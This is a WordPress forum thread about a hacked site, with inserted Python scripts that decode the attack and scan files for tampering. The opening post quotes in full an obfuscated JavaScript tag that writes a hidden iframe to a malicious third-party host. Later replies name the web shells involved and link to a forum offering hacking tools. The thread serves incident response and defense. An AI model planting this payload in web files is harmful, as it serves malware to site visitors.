WordPress 2.3.3 HACKED

  • Last week my site was hacked. Multiple wordpress files had the following code appended at the very end:

    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45%2C100%2C118%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>

    This was in many wp-*.php files. I wiped my entire website's http root and installed the latest version of WP (2.3.3) since I was running an older version and I knew there were security fixes. I thought I was covered, until last night the same exact exploit was performed on my site. Again, this is a 100% clean 2.3.3 installation. I’m 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files. The only way I even noticed this “hack” is because the code invalidates/breaks my rss feed.

    I found one prior instance of this hack on this board, and it was with an older version of wordpress. I have NOTHING else installed on this site; the wordpress 2.3.3 files are the only files in my http root. The ONLY plugins I have installed or even on the server are Akismet and Feed Locations.

    Aside from changing my passwords (which I’m certain will not close this loophole), is there any way to prevent this from happening?
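The appended tag above is two layers of obfuscation (unescape() over a String.fromCharCode() list) around a single document.write(). The following is an added example, not code from the thread or from WordPress: it statically decodes that exact payload without running any JavaScript, and then walks a document root flagging files that carry the same appended script or the comment tags of the two web shells the thread later found in the theme directory. The directory layout, the file contents and the nstview.php stand-in are constructed for the demo; the payload string is the one quoted in the post.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# The exact argument passed to unescape() in the script quoted at the top of the
# thread, split across adjacent literals for readability.
PAYLOAD = (
    "document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32"
    "%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45"
    "%2C100%2C118%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101"
    "%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48"
    "%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47"
    "%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"
)

# Matches the whole appended tag: <script ...> eval(unescape("...")); </script>
INJECTED_SCRIPT = re.compile(
    r'<script[^>]*>\s*eval\(unescape\("([^"]*)"\)\)\s*;?\s*</script>', re.IGNORECASE
)

# Strings that identify the two web shells the thread found in the theme directory.
WEBSHELL_MARKERS = ("nst.void.ru", "network security team", "c99madshell")

SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")


def decode_payload(encoded: str) -> str:
    """Recover what the script would document.write(), without executing any JS.

    Layer 1 is unescape() (percent-encoding); layer 2 is String.fromCharCode()
    over a list of decimal code points. Both are reversed statically here.
    """
    js = unquote(encoded)
    match = re.search(r"String\.fromCharCode\(([\d,\s]+)\)", js)
    if not match:
        return js  # unknown shape: hand back the percent-decoded JS for inspection
    return "".join(chr(int(n)) for n in match.group(1).split(","))


def scan_text(text: str) -> dict:
    """Return decoded injected scripts and web-shell markers found in one file."""
    injected = [decode_payload(enc) for enc in INJECTED_SCRIPT.findall(text)]
    lowered = text.lower()
    markers = [m for m in WEBSHELL_MARKERS if m in lowered]
    return {"injected": injected, "markers": markers}


def scan_tree(root: str) -> dict:
    """Walk a document root and report only files with findings, keyed by relative path."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                result = scan_text(fh.read())
            if result["injected"] or result["markers"]:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = result
    return findings


def demo() -> dict:
    """Build a constructed mini document root and scan it.

    One core file has the thread's script appended, the theme directory holds a
    stand-in for the nstview shell (only its HTML comment tag is reproduced),
    and one file is clean and must not be reported.
    """
    script_tag = '<script language="JavaScript"> eval(unescape("%s")); </script>' % PAYLOAD
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "mine")
        os.makedirs(theme)
        with open(os.path.join(root, "wp-settings.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php\n// constructed stand-in for the real file\n?>\n" + script_tag)
        with open(os.path.join(root, "wp-config-sample.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php\n// clean file\n?>\n")
        with open(os.path.join(theme, "nstview.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php /* constructed stand-in, no shell code */ ?>\n"
                     "<!-- Network security team :: nst.void.ru -->\n")
        return scan_tree(root)


if __name__ == "__main__":
    for path, result in demo().items():
        print(path, result)
```

Decoding shows the script writes a zero-by-zero iframe pointing at a third-party URL, which is why a visitor's browser (not the server) raised the downloader alert mentioned later in the thread; the regex is deliberately anchored on the eval(unescape(...)) idiom rather than on the domain, so a re-encoded copy of the same tag is still caught.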

Viewing 15 replies - 1 through 15 (of 16 total)
  • Thread Starter skitals

    (@skitals)

    As far as I can tell, the only file modified this time around was wp-settings.php. Removing the code from that file fixed my rss feed, but there still may be more modified files that I can’t find as there was last time.

    Yes. You can inform, no, you must inform your host. It might happen that the server has been hacked through another site and from there they (the hackers) got access to all sites on that machine…

    I’m 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files.

    and the permissions of those files were?

    also:

    here are some headers returned by your site:

    HTTP/1.1 200 OK
    Date: Thu, 21 Feb 2008 03:37:32 GMT
    Server: Apache/2.0.54 (Unix) PHP/4.4.7 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2
    X-Powered-By: PHP/5.2.3
    X-Pingback: http://www.gamerawr.com/xmlrpc.php
    Vary: Accept-Encoding
    Content-Type: text/html; charset=UTF-8

    You may not know this but Apache 2.0.54 is a little dated, and there have been several security issues fixed since that release.

    Is that a dreamhost issue, yes, but that doesn't make it any less an issue.

    I point that out not necessarily to cast doubt, but to say that files being physically changed lends credence to it not being a WP hack, but a server side problem related to what is hosting your site OR a permissions weakness that allowed a breach.

    I can put up a static HTML page on an insecure web server with insecure permissions, and I will be able to find someone that is able to tack malicious code onto that file.

    Thread Starter skitals

    (@skitals)

    Ok, I will be contacting dreamhost… but regarding permissions… how should I set my permissions for a wordpress install? You know how WP is, with the over-simplified instructions. I will be honest, I didn’t do anything but upload all the files and run the upgrade script.

    Thread Starter skitals

    (@skitals)

    Ok, a support ticket has been sent to dreamhost. Sorry I was so quick to blame this on WP, I just forgot how many variables there are involved in this, especially when running a site on a shared server I don’t administer. I was just under the impression dreamhost was more security conscious than this 🙁

    Thread Starter skitals

    (@skitals)

    I checked my permissions of wp-settings.php (the file hacked), and it is set to 644, which I BELIEVE is correct. Please let me know if this shines any new light on the issue.

    files = 644
    folders = 755
    That’s the correct setting. However, on many hosts you need to make folders like wp-content 777 (i.e. world writable) in order to be able to upload images…

    I’ll bet dollars for donuts that dreamhost calls it out as a WP problem 😛

    Not to suggest that it might not be, just that it’s easier for a host to blame a software package, no matter what the cause.

    Thread Starter skitals

    (@skitals)

    We will see. I gave them a link to this thread as reference. I’ve yet to hear back from them.

    Thread Starter skitals

    (@skitals)

    Crap. It looks like this may all be my own fault. When my site was first hacked with an ancient wordpress version, yes, I erased my entire http root and installed the latest wp release. But what did I copy back? My wp theme. And what was in my theme directory? TWO HACKED PHP/JAVA SCRIPTS!

    One appears to be “nstview”, a file management script included with a lot of “web hacking for newbs” kits. It is tagged at the bottom: <!-- Network security team :: nst.void.ru -->

    The other is “C99madShell v. 2.0 madnet edition” which also looks to be a remote file manager.

    Now, I have no way of knowing if these are from a related hack, but clearly these are wide open backdoors that hackers somehow installed on my OLD wordpress installation. I can’t believe I’m dense enough to not thoroughly check my personal theme directory when I was trying to be so meticulous in my upgrade.

    With these files removed (that entire theme directory, actually), I guess it’s now just a game of wait and see. I should do a fine search to see if anything else has been tampered with while this backdoor was in place.

    Interestingly enough BOTH of these shell scripts as well as “PHP Injection Scanner” tools were recently posted in a “web hacking tools collection” on this script kiddie site: http://www.katzforums.com/showthread.php?t=50022 No doubt that package has everything that was used in this exploit.

    The only question that remains is: is my site still vulnerable?
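Two points in the thread so far call for the same tool: the 644/755 permission check a few posts up, and the "fine search to see if anything else has been tampered with" that the thread starter now wants. The following is an added example, not code from the thread or from WordPress: it snapshots SHA-256 digests of a clean install, compares a live tree against that baseline (modified core files, added files such as a leftover shell in the theme directory, missing files), and lists anything world-writable. The two directory trees, their contents and the chmod are constructed for the demo; in practice the baseline would be taken from a freshly unpacked release archive.

```python
import hashlib
import os
import shutil
import stat
import tempfile


def hash_tree(root: str) -> dict:
    """Map every regular file under root (relative path) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(path, root).replace(os.sep, "/")] = h.hexdigest()
    return digests


def compare_trees(baseline: dict, live: dict) -> dict:
    """Classify paths as modified, added (absent from the baseline) or missing."""
    return {
        "modified": sorted(p for p in baseline if p in live and live[p] != baseline[p]),
        "added": sorted(p for p in live if p not in baseline),
        "missing": sorted(p for p in baseline if p not in live),
    }


def world_writable(root: str) -> list:
    """Relative paths of files and directories with the 'other write' bit set.

    The 644/755 baseline from the thread leaves this bit clear; a 777 wp-content
    (the upload-directory exception mentioned there) is exactly what shows up here.
    """
    found = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IWOTH:
                found.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(found)


def demo() -> dict:
    """Constructed scenario: snapshot a clean install, then tamper with a copy.

    The tampering mirrors the thread: a script appended to wp-settings.php, a
    stray PHP file in the theme directory carried over from the old install,
    one core file removed, and wp-content made world-writable.
    """
    clean_files = {
        "wp-settings.php": "<?php\n// constructed stand-in\n?>\n",
        "wp-content/themes/mine/header.php": "<html><head></head>\n",
        "wp-includes/version.php": "<?php $wp_version = '2.3.3';\n",
    }
    with tempfile.TemporaryDirectory() as work:
        clean = os.path.join(work, "clean")
        for rel, body in clean_files.items():
            path = os.path.join(clean, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        baseline = hash_tree(clean)

        live = os.path.join(work, "live")
        shutil.copytree(clean, live)
        with open(os.path.join(live, "wp-settings.php"), "a", encoding="utf-8") as fh:
            fh.write('<script> eval(unescape("x")); </script>\n')  # stand-in for the appended tag
        shell = os.path.join(live, "wp-content", "themes", "mine", "nstview.php")
        with open(shell, "w", encoding="utf-8") as fh:
            fh.write("<?php /* constructed stand-in for a leftover shell */ ?>\n")
        os.remove(os.path.join(live, "wp-includes", "version.php"))
        os.chmod(os.path.join(live, "wp-content"), 0o777)

        return {
            "diff": compare_trees(baseline, hash_tree(live)),
            "world_writable": world_writable(live),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The "added" list is the one that would have caught the two shells in the copied-back theme: a signature scan only finds shells it already knows, whereas anything not in the clean baseline is reported regardless of what it contains. Customised theme files will naturally appear there too, so the baseline should include the theme as it was originally written, not as it was recovered from the compromised host.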

    Thread Starter skitals

    (@skitals)

    I’m nearly certain whoever did this used the hacking toolset I posted above. I’m looking through it all now, and it even includes an xmlrpc vulnerability scanner and exploiter, which is what I believe the latest WP security update patches.

    So it looks like case closed. It was a known wp vulnerability that was recently patched. The moral of the story is: always keep your installation up to date, and DO NOT BLINDLY COPY BACK YOUR CUSTOMIZED FILES. Perhaps the WP readme should make a point of this in the future. While the vulnerability was plugged, I was still left with the malicious software that was installed.

    Maybe this is a stupid question, but would putting the wp-admin folder under password protection help at all?

    No, not really.

    So I had a client hacked today who had 2.2.?, and after reading this post, I’ve installed 2.3.3 and then uploaded the custom theme from my computer (which is clean).

    The attack was similar, they modified a header.php file and added some javascript code at the end. Would it help if I posted the javascript here (I don’t want to help these hackers, so I wanted to ask first).

    We were tipped off when the client looked at his blog on his PC and got a virus alert about JS/Downloader-AUD and said it was a Trojan.

    (Note, the client was also on DreamHost)

    I just wrote a blog article about this and included a screenshot of the VirusAlert message we received. Hope someone will find this helpful.

    http://aldebaranwebdesign.com/blog/wordpress-hack-causes-virusscan-alert/

  • The topic ‘WordPress 2.3.3 HACKED’ is closed to new replies.